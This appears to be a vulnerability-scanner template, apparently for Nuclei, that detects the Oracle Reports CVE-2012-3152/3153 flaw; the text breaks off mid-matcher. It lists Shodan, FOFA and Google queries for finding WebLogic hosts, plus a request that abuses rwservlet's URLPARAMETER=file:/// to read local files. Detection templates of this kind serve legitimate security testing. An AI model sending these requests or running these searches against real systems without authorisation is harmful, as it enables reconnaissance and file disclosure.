id: CVE-2012-3153 info: name: Oracle Forms & Reports RCE (CVE-2012-3152 & CVE-2012-3153) author: Sid Ahmed MALAOUI @ Realistic Security severity: medium description: | An unspecified vulnerability in the Oracle Reports Developer component in Oracle Fusion Middleware 11.1.1.4, 11.1.1.6, and 11.1.2.0 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Report Server Component. impact: | Successful exploitation of this vulnerability can lead to unauthorized remote code execution. remediation: | Apply the necessary patches and updates provided by Oracle to mitigate this vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2012-3152 - https://www.exploit-db.com/exploits/31737 - https://www.oracle.com/security-alerts/cpuoct2012.html - http://www.oracle.com/technetwork/topics/security/cpuoct2012-1515893.html - http://blog.netinfiltration.com/2013/11/03/oracle-reports-cve-2012-3152-and-cve-2012-3153/ classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:N cvss-score: 6.4 cve-id: CVE-2012-3153 cwe-id: NVD-CWE-noinfo epss-score: 0.95986 epss-percentile: 0.99471 cpe: cpe:2.3:a:oracle:fusion_middleware:11.1.1.4.0:*:*:*:*:*:*:* metadata: max-request: 2 vendor: oracle product: fusion_middleware shodan-query: - http.title:"weblogic" - http.html:"weblogic application server" fofa-query: - title="weblogic" - body="weblogic application server" google-query: intitle:"weblogic" tags: cve,cve2012,oracle,rce,edb http: - method: GET path: - "{{BaseURL}}/reports/rwservlet/showenv" - "{{BaseURL}}/reports/rwservlet?report=test.rdf&desformat=html&destype=cache&JOBTYPE=rwurl&URLPARAMETER=file:///" matchers-condition: and matchers: - type: dsl dsl: - 'contains(body_1, "Reports Servlet")' - type: dsl dsl: - '!contains(body_2, "